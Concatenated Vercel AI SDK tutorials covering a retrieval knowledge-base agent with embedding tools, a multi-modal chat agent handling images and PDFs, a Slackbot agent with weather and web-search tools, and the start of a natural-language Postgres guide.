const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

In this code, you first define the model you want to use for the embeddings. In this example, you are using OpenAI’s text-embedding-ada-002 embedding model.

Update Server Action

Open the file at lib/actions/resources.ts. This file has one function, createResource, which, as the name implies, allows you to create a resource.

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    return 'Resource successfully created.';
  } catch (e) {
    if (e instanceof Error)
      return e.message.length > 0 ? e.message : 'Error, please try again.';
  }
};

Update the file with the following code:

'use server';

import {
  NewResourceParams,
  insertResourceSchema,
  resources,
} from '@/lib/db/schema/resources';
import { db } from '../db';
import { generateEmbeddings } from '../ai/embedding';
import { embeddings as embeddingsTable } from '../db/schema/embeddings';

export const createResource = async (input: NewResourceParams) => {
  try {
    const { content } = insertResourceSchema.parse(input);

    const [resource] = await db
      .insert(resources)
      .values({ content })
      .returning();

    const embeddings = await generateEmbeddings(content);
    await db.insert(embeddingsTable).values(
      embeddings.map(embedding => ({
        resourceId: resource.id,
        ...embedding,
      })),
    );

    return 'Resource successfully created and embedded.';
  } catch (error) {
    return error instanceof Error && error.message.length > 0
      ? error.message
      : 'Error, please try again.';
  }
};

Create Root Page

Great! Let's build the frontend. The AI SDK’s useChat hook allows you to easily create a conversational user interface for your agent.

Replace your root page (app/page.tsx) with the following code.

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Run the following command to start the Next.js dev server:

You can customize the endpoint in the useChat configuration object

Create API Route

Create a file at app/api/chat/route.ts by running the following command:

Open the file and add the following code:

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and try to send a message again. You should see a response from the model streamed directly in!

Refining your prompt

While you now have a working agent, it isn't doing anything special.

import { convertToModelMessages, streamText, UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

In its current form, your agent is now, well, useless. How do you give the model the ability to add and query information?

Using Tools

A tool is a function that can be called by the model to perform a specific task. You can think of a tool like a program you give to the model that it can run as and when it deems necessary.

Let’s see how you can create a tool to give the model the ability to create, embed and save a resource to your agents’ knowledge base.

Add Resource Tool

Update your route handler with the following code:

import { createResource } from '@/lib/actions/resources';
import { convertToModelMessages, streamText, tool, UIMessage } from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

In this code, you define a tool called addResource. This tool has three elements:

description: description of the tool that will influence when the tool is picked.
inputSchema: Zod schema that defines the input necessary for the tool to run.
execute: An asynchronous function that is called with the arguments from the tool call.

Head back to the browser and tell the model your favorite food. You should see an empty response in the UI. Did anything happen? Let’s see. Run the following command in a new terminal window.

This will start Drizzle Studio where we can view the rows in our database. You should see a new row in both the embeddings and resources table with your favorite food!

Let’s make a few changes in the UI to communicate to the user when a tool has been called. Head back to your root page (app/page.tsx) and add the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');
  const { messages, sendMessage } = useChat();
  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      <div className="space-y-4">
        {messages.map(m => (
          <div key={m.id} className="whitespace-pre-wrap">
            <div>
              <div className="font-bold">{m.role}</div>
              {m.parts.map(part => {
                switch (part.type) {
                  case 'text':
                    return <p>{part.text}</p>;
                  case 'tool-addResource':
                  case 'tool-getInformation':
                    return (
                      <p>
                        call{part.state === 'output-available' ? 'ed' : 'ing'}{' '}
                        tool: {part.type}
                        <pre className="my-4 bg-zinc-100 p-2 rounded-sm">
                          {JSON.stringify(part.input, null, 2)}
                        </pre>
                      </p>
                    );
                }
              })}
            </div>
          </div>
        ))}
      </div>

      <form
        onSubmit={e => {
          e.preventDefault();
          sendMessage({ text: input });
          setInput('');
        }}
      >
        <input
          className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.currentTarget.value)}
        />
      </form>
    </div>
  );
}

Improving UX with Multi-Step Calls

Open your root page (api/chat/route.ts) and add the following key to the streamText configuration object:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  isStepCount,
} from 'ai';
import { z } from 'zod';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    messages: await convertToModelMessages(messages),
    stopWhen: isStepCount(5),
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser and tell the model your favorite pizza topping (note: pineapple is not an option). You should see a follow-up response from the model confirming the action.

Retrieve Resource Tool

import { embed, embedMany } from 'ai';
import { db } from '../db';
import { cosineDistance, desc, gt, sql } from 'drizzle-orm';
import { embeddings } from '../db/schema/embeddings';

const embeddingModel = 'openai/text-embedding-ada-002';

const generateChunks = (input: string): string[] => {
  return input
    .trim()
    .split('.')
    .filter(i => i !== '');
};

export const generateEmbeddings = async (
  value: string,
): Promise<Array<{ embedding: number[]; content: string }>> => {
  const chunks = generateChunks(value);
  const { embeddings } = await embedMany({
    model: embeddingModel,
    values: chunks,
  });
  return embeddings.map((e, i) => ({ content: chunks[i], embedding: e }));
};

export const generateEmbedding = async (value: string): Promise<number[]> => {
  const input = value.replaceAll('\\n', ' ');
  const { embedding } = await embed({
    model: embeddingModel,
    value: input,
  });
  return embedding;
};

export const findRelevantContent = async (userQuery: string) => {
  const userQueryEmbedded = await generateEmbedding(userQuery);
  const similarity = sql<number>`1 - (${cosineDistance(
    embeddings.embedding,
    userQueryEmbedded,
  )})`;
  const similarGuides = await db
    .select({ name: embeddings.content, similarity })
    .from(embeddings)
    .where(gt(similarity, 0.5))
    .orderBy(t => desc(t.similarity))
    .limit(4);
  return similarGuides;
};

In this code, you add two functions:

generateEmbedding: generate a single embedding from an input string
findRelevantContent: embeds the user’s query, searches the database for similar items, then returns relevant items

With that done, it’s onto the final step: creating the tool.

Go back to your route handler (api/chat/route.ts) and add a new tool called getInformation:

import { createResource } from '@/lib/actions/resources';
import {
  convertToModelMessages,
  streamText,
  tool,
  UIMessage,
  isStepCount,
} from 'ai';
import { z } from 'zod';
import { findRelevantContent } from '@/lib/ai/embedding';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
    stopWhen: isStepCount(5),
    system: `You are a helpful assistant. Check your knowledge base before answering any questions.
    Only respond to questions using information from tool calls.
    if no relevant information is found in the tool calls, respond, "Sorry, I don't know."`,
    tools: {
      addResource: tool({
        description: `add a resource to your knowledge base.
          If the user provides a random piece of knowledge unprompted, use this tool without asking for confirmation.`,
        inputSchema: z.object({
          content: z
            .string()
            .describe('the content or resource to add to the knowledge base'),
        }),
        execute: async ({ content }) => createResource({ content }),
      }),
      getInformation: tool({
        description: `get information from your knowledge base to answer questions.`,
        inputSchema: z.object({
          question: z.string().describe('the users question'),
        }),
        execute: async ({ question }) => findRelevantContent(question),
      }),
    },
  });

  return result.toUIMessageStreamResponse();
}

Head back to the browser, refresh the page, and ask for your favorite food. You should see the model call the getInformation tool, and then use the relevant information to formulate a response!

Conclusion

Troubleshooting Migration Error

If you're using the Vercel setup above, you can run the command directly by either:

Going to the Neon console and entering the command there, or
Going back to the Vercel platform, navigating to the Quick Start section of your database, and finding the PSQL connection command (second tab). This will connect to your instance in the terminal where you can run the command directly.

More info.

title: Multi-Modal Agent description: Learn how to build a multi-modal agent that can process images and PDFs with the AI SDK. tags: ['multi-modal', 'agent', 'images', 'pdf', 'vision', 'next']

Multi-Modal Agent

In this guide, you will build a multi-modal agent capable of understanding both images and PDFs.

We'll build this agent using OpenAI's GPT-4o, but the same code works seamlessly with other providers - you can switch between them by changing just one line of code.

Prerequisites

To follow this quickstart, you'll need:

Node.js 18+ and pnpm installed on your local development machine.
A Vercel AI Gateway API key.

If you haven't obtained your Vercel AI Gateway API key, you can do so by signing up on the Vercel website.

Create Your Application

Start by creating a new Next.js application. This command will create a new directory named multi-modal-agent and set up a basic Next.js application inside it.

Navigate to the newly created directory:

Install dependencies

Install ai and @ai-sdk/react, the AI SDK package and the AI SDK's React package respectively.

<Tab>
  <Snippet text="bun add ai @ai-sdk/react" dark />
</Tab>

Configure your Vercel AI Gateway API key

Create a .env.local file in your project root and add your Vercel AI Gateway API key. This key authenticates your application with Vercel AI Gateway.

Edit the .env.local file:

AI_GATEWAY_API_KEY=your_api_key_here

Replace your_api_key_here with your actual Vercel AI Gateway API key.

Implementation Plan

To build a multi-modal agent, you will need to:

Create a Route Handler to handle incoming chat messages and generate responses.
Wire up the UI to display chat messages, provide a user input, and handle submitting new messages.
Add the ability to upload images and PDFs and attach them alongside the chat messages.

Create a Route Handler

Create a route handler, app/api/chat/route.ts and add the following code:

import { streamText, convertToModelMessages, type UIMessage } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages }: { messages: UIMessage[] } = await req.json();

  const result = streamText({
    model: 'openai/gpt-4o',
    messages: await convertToModelMessages(messages),
  });

  return result.toUIMessageStreamResponse();
}

Let's take a look at what is happening in this code:

Define an asynchronous POST request handler and extract messages from the body of the request. The messages variable contains a history of the conversation between you and the agent and provides the agent with the necessary context to make the next generation.
Convert the UI messages to model messages using convertToModelMessages, which transforms the UI-focused message format to the format expected by the language model.
Call streamText, which is imported from the ai package. This function accepts a configuration object that contains a model provider and messages (converted in step 2). You can pass additional settings to further customize the model's behavior.
The streamText function returns a StreamTextResult. This result object contains the toUIMessageStreamResponse function which converts the result to a streamed response object.
Finally, return the result to the client to stream the response.

This Route Handler creates a POST request endpoint at /api/chat.

Wire up the UI

Now that you have a Route Handler that can query a large language model (LLM), it's time to setup your frontend. AI SDK UI abstracts the complexity of a chat interface into one hook, useChat.

Update your root page (app/page.tsx) with the following code to show a list of chat messages and provide a user message input:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';

export default function Chat() {
  const [input, setInput] = useState('');

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            return null;
          })}
        </div>
      ))}

      <form
        onSubmit={async event => {
          event.preventDefault();
          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }],
          });
          setInput('');
        }}
        className="fixed bottom-0 w-full max-w-md mb-8 border border-gray-300 rounded shadow-xl"
      >
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

This page utilizes the useChat hook, configured with DefaultChatTransport to specify the API endpoint. The useChat hook provides multiple utility functions and state variables:

messages - the current chat messages (an array of objects with id, role, and parts properties).
sendMessage - function to send a new message to the AI.
Each message contains a parts array that can include text, images, PDFs, and other content types.
Files are converted to data URLs before being sent to maintain compatibility across different environments.

Add File Upload

Update your root page (app/page.tsx) with the following code:

'use client';

import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useRef, useState } from 'react';
import Image from 'next/image';

async function convertFilesToDataURLs(files: FileList) {
  return Promise.all(
    Array.from(files).map(
      file =>
        new Promise<{
          type: 'file';
          mediaType: string;
          url: string;
        }>((resolve, reject) => {
          const reader = new FileReader();
          reader.onload = () => {
            resolve({
              type: 'file',
              mediaType: file.type,
              url: reader.result as string,
            });
          };
          reader.onerror = reject;
          reader.readAsDataURL(file);
        }),
    ),
  );
}

export default function Chat() {
  const [input, setInput] = useState('');
  const [files, setFiles] = useState<FileList | undefined>(undefined);
  const fileInputRef = useRef<HTMLInputElement>(null);

  const { messages, sendMessage } = useChat({
    transport: new DefaultChatTransport({
      api: '/api/chat',
    }),
  });

  return (
    <div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
      {messages.map(m => (
        <div key={m.id} className="whitespace-pre-wrap">
          {m.role === 'user' ? 'User: ' : 'AI: '}
          {m.parts.map((part, index) => {
            if (part.type === 'text') {
              return <span key={`${m.id}-text-${index}`}>{part.text}</span>;
            }
            if (part.type === 'file' && part.mediaType?.startsWith('image/')) {
              return (
                <Image
                  key={`${m.id}-image-${index}`}
                  src={part.url}
                  width={500}
                  height={500}
                  alt={`attachment-${index}`}
                />
              );
            }
            if (part.type === 'file' && part.mediaType === 'application/pdf') {
              return (
                <iframe
                  key={`${m.id}-pdf-${index}`}
                  src={part.url}
                  width={500}
                  height={600}
                  title={`pdf-${index}`}
                />
              );
            }
            return null;
          })}
        </div>
      ))}

      <form
        className="fixed bottom-0 w-full max-w-md p-2 mb-8 border border-gray-300 rounded shadow-xl space-y-2"
        onSubmit={async event => {
          event.preventDefault();

          const fileParts =
            files && files.length > 0
              ? await convertFilesToDataURLs(files)
              : [];

          sendMessage({
            role: 'user',
            parts: [{ type: 'text', text: input }, ...fileParts],
          });

          setInput('');
          setFiles(undefined);

          if (fileInputRef.current) {
            fileInputRef.current.value = '';
          }
        }}
      >
        <input
          type="file"
          accept="image/*,application/pdf"
          className=""
          onChange={event => {
            if (event.target.files) {
              setFiles(event.target.files);
            }
          }}
          multiple
          ref={fileInputRef}
        />
        <input
          className="w-full p-2"
          value={input}
          placeholder="Say something..."
          onChange={e => setInput(e.target.value)}
        />
      </form>
    </div>
  );
}

In this code, you:

Add a helper function convertFilesToDataURLs to convert file uploads to data URLs.
Create state to hold the input text, files, and a ref to the file input field.
Configure useChat with DefaultChatTransport to specify the API endpoint.
Display messages using the parts array structure, rendering text, images, and PDFs appropriately.
Update the onSubmit function to send messages with the sendMessage function, including both text and file parts.
Add a file input field to the form, including an onChange handler to handle updating the files state.

Running Your Application

With that, you have built everything you need for your multi-modal agent! To start your application, use the command:

Head to your browser and open http://localhost:3000. You should see an input field and a button to upload files.

Try uploading an image or PDF and asking the model questions about it. Watch as the model's response is streamed back to you!

Using Other Providers

With the AI SDK's unified provider interface you can easily switch to other providers that support multi-modal capabilities:

// Using Anthropic
const result = streamText({
  model: 'anthropic/claude-sonnet-4-20250514',
  messages: await convertToModelMessages(messages),
});

// Using Google
const result = streamText({
  model: 'google/gemini-2.5-flash',
  messages: await convertToModelMessages(messages),
});

Install the provider package (@ai-sdk/anthropic or @ai-sdk/google) and update your API keys in .env.local. The rest of your code remains the same.

Where to Next?

You've built a multi-modal AI agent using the AI SDK! Experiment and extend the functionality of this application further by exploring tool calling.

title: Slackbot Agent Guide description: Learn how to use the AI SDK to build an AI Agent in Slack. tags: ['agents', 'chatbot']

Building an AI Agent in Slack with the AI SDK

In this guide, you will learn how to build a Slackbot powered by the AI SDK. The bot will be able to respond to direct messages and mentions in channels using the full context of the thread.

Slack App Setup

Before we start building, you'll need to create and configure a Slack app:

Go to api.slack.com/apps
Click "Create New App" and choose "From scratch"
Give your app a name and select your workspace
Under "OAuth & Permissions", add the following bot token scopes:
- app_mentions:read
- chat:write
- im:history
- im:write
- assistant:write
Install the app to your workspace (button under "OAuth Tokens" subsection)
Copy the Bot User OAuth Token and Signing Secret for the next step
Under App Home -> Show Tabs -> Chat Tab, check "Allow users to send Slash commands and messages from the chat tab"

Project Setup

This project uses the following stack:

Getting Started

Clone the repository and check out the starter branch

Install dependencies

Project Structure

The starter repository already includes:

Slack utilities (lib/slack-utils.ts) including functions for validating incoming requests, converting Slack threads to AI SDK compatible message formats, and getting the Slackbot's user ID
General utility functions (lib/utils.ts) including initial Exa setup
Files to handle the different types of Slack events (lib/handle-messages.ts and lib/handle-app-mention.ts)
An API endpoint (POST) for Slack events (api/events.ts)

Event Handler

First, let's take a look at our API route (api/events.ts):

import type { SlackEvent } from '@slack/web-api';
import {
  assistantThreadMessage,
  handleNewAssistantMessage,
} from '../lib/handle-messages';
import { waitUntil } from '@vercel/functions';
import { handleNewAppMention } from '../lib/handle-app-mention';
import { verifyRequest, getBotId } from '../lib/slack-utils';

export async function POST(request: Request) {
  const rawBody = await request.text();
  const payload = JSON.parse(rawBody);
  const requestType = payload.type as 'url_verification' | 'event_callback';

  // See https://api.slack.com/events/url_verification
  if (requestType === 'url_verification') {
    return new Response(payload.challenge, { status: 200 });
  }

  await verifyRequest({ requestType, request, rawBody });

  try {
    const botUserId = await getBotId();

    const event = payload.event as SlackEvent;

    if (event.type === 'app_mention') {
      waitUntil(handleNewAppMention(event, botUserId));
    }

    if (event.type === 'assistant_thread_started') {
      waitUntil(assistantThreadMessage(event));
    }

    if (
      event.type === 'message' &&
      !event.subtype &&
      event.channel_type === 'im' &&
      !event.bot_id &&
      !event.bot_profile &&
      event.bot_id !== botUserId
    ) {
      waitUntil(handleNewAssistantMessage(event, botUserId));
    }

    return new Response('Success!', { status: 200 });
  } catch (error) {
    console.error('Error generating response', error);
    return new Response('Error generating response', { status: 500 });
  }
}

You then handle three types of events: app_mention, assistant_thread_started, and message:

For app_mention, you call handleNewAppMention with the event and the bot user ID.
For assistant_thread_started, you call assistantThreadMessage with the event.
For message, you call handleNewAssistantMessage with the event and the bot user ID.

Finally, you respond with a success message to Slack. Note, each handler function is wrapped in a waitUntil function. Let's take a look at what this means and why it's important.

The waitUntil Function

This means, your API endpoint will:

Immediately respond to Slack (within 3 seconds)
Continue processing the message asynchronously
Send the AI response when it's ready

Event Handlers

Let's look at how each event type is currently handled.

App Mentions

When a user mentions your bot in a channel, the app_mention event is triggered. The handleNewAppMention function in handle-app-mention.ts processes these mentions:

Checks if the message is from a bot to avoid infinite response loops
Creates a status updater to show the bot is "thinking"
If the mention is in a thread, it retrieves the thread history
Calls the LLM with the message content (using the generateResponse function which you will implement in the next section)
Updates the initial "thinking" message with the AI response

Here's the code for the handleNewAppMention function:

import { AppMentionEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

const updateStatusUtil = async (
  initialStatus: string,
  event: AppMentionEvent,
) => {
  const initialMessage = await client.chat.postMessage({
    channel: event.channel,
    thread_ts: event.thread_ts ?? event.ts,
    text: initialStatus,
  });

  if (!initialMessage || !initialMessage.ts)
    throw new Error('Failed to post initial message');

  const updateMessage = async (status: string) => {
    await client.chat.update({
      channel: event.channel,
      ts: initialMessage.ts as string,
      text: status,
    });
  };
  return updateMessage;
};

export async function handleNewAppMention(
  event: AppMentionEvent,
  botUserId: string,
) {
  console.log('Handling app mention');
  if (event.bot_id || event.bot_id === botUserId || event.bot_profile) {
    console.log('Skipping app mention');
    return;
  }

  const { thread_ts, channel } = event;
  const updateMessage = await updateStatusUtil('is thinking...', event);

  if (thread_ts) {
    const messages = await getThread(channel, thread_ts, botUserId);
    const result = await generateResponse(messages, updateMessage);
    updateMessage(result);
  } else {
    const result = await generateResponse(
      [{ role: 'user', content: event.text }],
      updateMessage,
    );
    updateMessage(result);
  }
}

Now let's see how new assistant threads and messages are handled.

Assistant Thread Messages

When a user starts a thread with your assistant, the assistant_thread_started event is triggered. The assistantThreadMessage function in handle-messages.ts handles this:

Posts a welcome message to the thread
Sets up suggested prompts to help users get started

Here's the code for the assistantThreadMessage function:

import type { AssistantThreadStartedEvent } from '@slack/web-api';
import { client } from './slack-utils';

export async function assistantThreadMessage(
  event: AssistantThreadStartedEvent,
) {
  const { channel_id, thread_ts } = event.assistant_thread;
  console.log(`Thread started: ${channel_id} ${thread_ts}`);
  console.log(JSON.stringify(event));

  await client.chat.postMessage({
    channel: channel_id,
    thread_ts: thread_ts,
    text: "Hello, I'm an AI assistant built with the AI SDK by Vercel!",
  });

  await client.assistant.threads.setSuggestedPrompts({
    channel_id: channel_id,
    thread_ts: thread_ts,
    prompts: [
      {
        title: 'Get the weather',
        message: 'What is the current weather in London?',
      },
      {
        title: 'Get the news',
        message: 'What is the latest Premier League news from the BBC?',
      },
    ],
  });
}

Direct Messages

For direct messages to your bot, the message event is triggered and the event is handled by the handleNewAssistantMessage function in handle-messages.ts:

Verifies the message isn't from a bot
Updates the status to show the response is being generated
Retrieves the conversation history
Calls the LLM with the conversation context
Posts the LLM's response to the thread

Here's the code for the handleNewAssistantMessage function:

import type { GenericMessageEvent } from '@slack/web-api';
import { client, getThread } from './slack-utils';
import { generateResponse } from './ai';

export async function handleNewAssistantMessage(
  event: GenericMessageEvent,
  botUserId: string,
) {
  if (
    event.bot_id ||
    event.bot_id === botUserId ||
    event.bot_profile ||
    !event.thread_ts
  )
    return;

  const { thread_ts, channel } = event;
  const updateStatus = updateStatusUtil(channel, thread_ts);
  updateStatus('is thinking...');

  const messages = await getThread(channel, thread_ts, botUserId);
  const result = await generateResponse(messages, updateStatus);

  await client.chat.postMessage({
    channel: channel,
    thread_ts: thread_ts,
    text: result,
    unfurl_links: false,
    blocks: [
      {
        type: 'section',
        text: {
          type: 'mrkdwn',
          text: result,
        },
      },
    ],
  });

  updateStatus('');
}

With the event handlers in place, let's now implement the AI logic.

Implementing AI Logic

The core of our application is the generateResponse function in lib/generate-response.ts, which processes messages and generates responses using the AI SDK.

Here's how to implement it:

import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}`,
    messages,
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

This basic implementation:

Uses the AI SDK's generateText function to call Anthropic's claude-sonnet-4.5 model
Provides a system prompt to guide the model's behavior
Formats the response for Slack's markdown format

Enhancing with Tools

The real power of the AI SDK comes from tools that enable your bot to perform actions. Let's add two useful tools:

import { generateText, tool, ModelMessage, isStepCount } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
import { exa } from './utils';

export const generateResponse = async (
  messages: ModelMessage[],
  updateStatus?: (status: string) => void,
) => {
  const { text } = await generateText({
    model: __MODEL__,
    system: `You are a Slack bot assistant. Keep your responses concise and to the point.
    - Do not tag users.
    - Current date is: ${new Date().toISOString().split('T')[0]}
    - Always include sources in your final response if you use web search.`,
    messages,
    stopWhen: isStepCount(10),
    tools: {
      getWeather: tool({
        description: 'Get the current weather at a location',
        inputSchema: z.object({
          latitude: z.number(),
          longitude: z.number(),
          city: z.string(),
        }),
        execute: async ({ latitude, longitude, city }) => {
          updateStatus?.(`is getting weather for ${city}...`);

          const response = await fetch(
            `https://api.open-meteo.com/v1/forecast?latitude=${latitude}&longitude=${longitude}&current=temperature_2m,weathercode,relativehumidity_2m&timezone=auto`,
          );

          const weatherData = await response.json();
          return {
            temperature: weatherData.current.temperature_2m,
            weatherCode: weatherData.current.weathercode,
            humidity: weatherData.current.relativehumidity_2m,
            city,
          };
        },
      }),
      searchWeb: tool({
        description: 'Use this to search the web for information',
        inputSchema: z.object({
          query: z.string(),
          specificDomain: z
            .string()
            .nullable()
            .describe(
              'a domain to search if the user specifies e.g. bbc.com. Should be only the domain name without the protocol',
            ),
        }),
        execute: async ({ query, specificDomain }) => {
          updateStatus?.(`is searching the web for ${query}...`);
          const { results } = await exa.searchAndContents(query, {
            livecrawl: 'always',
            numResults: 3,
            includeDomains: specificDomain ? [specificDomain] : undefined,
          });

          return {
            results: results.map(result => ({
              title: result.title,
              url: result.url,
              snippet: result.text.slice(0, 1000),
            })),
          };
        },
      }),
    },
  });

  // Convert markdown to Slack mrkdwn format
  return text.replace(/\[(.*?)\]\((.*?)\)/g, '<$2|$1>').replace(/\*\*/g, '*');
};

In this updated implementation:

You added two tools:
- getWeather: Fetches weather data for a specified location
- searchWeb: Searches the web for information using the Exa API
You set stopWhen: isStepCount(10) to enable multi-step conversations. This defines the stopping conditions of your agent, when the model generates a tool call. This will automatically send any tool results back to the LLM to trigger additional tool calls or responses as the LLM deems necessary. This turns your LLM call from a one-off operation into a multi-step agentic flow.

How It Works

When a user interacts with your bot:

The Slack event is received and processed by your API endpoint
The user's message and the thread history is passed to the generateResponse function
The AI SDK processes the message and may invoke tools as needed
The response is formatted for Slack and sent back to the user

The tools are automatically invoked based on the user's intent. For example, if a user asks "What's the weather in London?", the AI will:

Recognize this as a weather query
Call the getWeather tool with London's coordinates (inferred by the LLM)
Process the weather data
Generate a final response, answering the user's question

Deploying the App

Install the Vercel CLI

Deploy the app

Copy the deployment URL and update the Slack app's Event Subscriptions to point to your Vercel URL
Go to your project's deployment settings (Your project -> Settings -> Environment Variables) and add your environment variables

SLACK_BOT_TOKEN=your_slack_bot_token
SLACK_SIGNING_SECRET=your_slack_signing_secret
OPENAI_API_KEY=your_openai_api_key
EXA_API_KEY=your_exa_api_key

Head back to the https://api.slack.com/ and navigate to the "Event Subscriptions" page. Enable events and add your deployment URL.

https://your-vercel-url.vercel.app/api/events

On the Events Subscription page, subscribe to the following events.
- app_mention
- assistant_thread_started
- message:im

Finally, head to Slack and test the app by sending a message to the bot.

Next Steps

You've built a Slack chatbot powered by the AI SDK! Here are some ways you could extend it:

Add memory for specific users to give the LLM context of previous interactions
Implement more tools like database queries or knowledge base searches
Add support for rich message formatting with blocks
Add analytics to track usage patterns

title: Natural Language Postgres description: Learn how to build a Next.js app that lets you talk to a PostgreSQL database in natural language. tags: ['agents', 'next', 'tools']

Natural Language Postgres Guide

In this guide, you will learn how to build an app that uses AI to interact with a PostgreSQL database using natural language.

The application will:

Generate SQL queries from a natural language input
Explain query components in plain English
Create a chart to visualise query results

You can find a completed version of this project at natural-language-postgres.vercel.app.

Project setup

This project uses the following stack:

Next.js (App Router)
AI SDK
OpenAI
Zod
Postgres with Vercel Postgres
shadcn-ui and TailwindCSS for styling
Recharts for data visualization

Clone repo

To focus on the AI-powered functionality rather than project setup and configuration we've prepared a starter repository which includes a database schema and a few components.

Clone the starter repository and check out the starter branch:

Project setup and data

Let's set up the project and seed the database with the dataset:

Install dependencies:

Copy the example environment variables file:

Add your environment variables to .env:

OPENAI_API_KEY="your_api_key_here"
POSTGRES_URL="..."
POSTGRES_PRISMA_URL="..."
POSTGRES_URL_NO_SSL="..."
POSTGRES_URL_NON_POOLING="..."
POSTGRES_USER="..."
POSTGRES_HOST="..."
POSTGRES_PASSWORD="..."
POSTGRES_DATABASE="..."

This project uses CB Insights' Unicorn Companies dataset. You can download the dataset by following these instructions:
- Navigate to CB Insights Unicorn Companies
- Enter in your email. You will receive a link to download the dataset.
- Save it as unicorns.csv in your project root

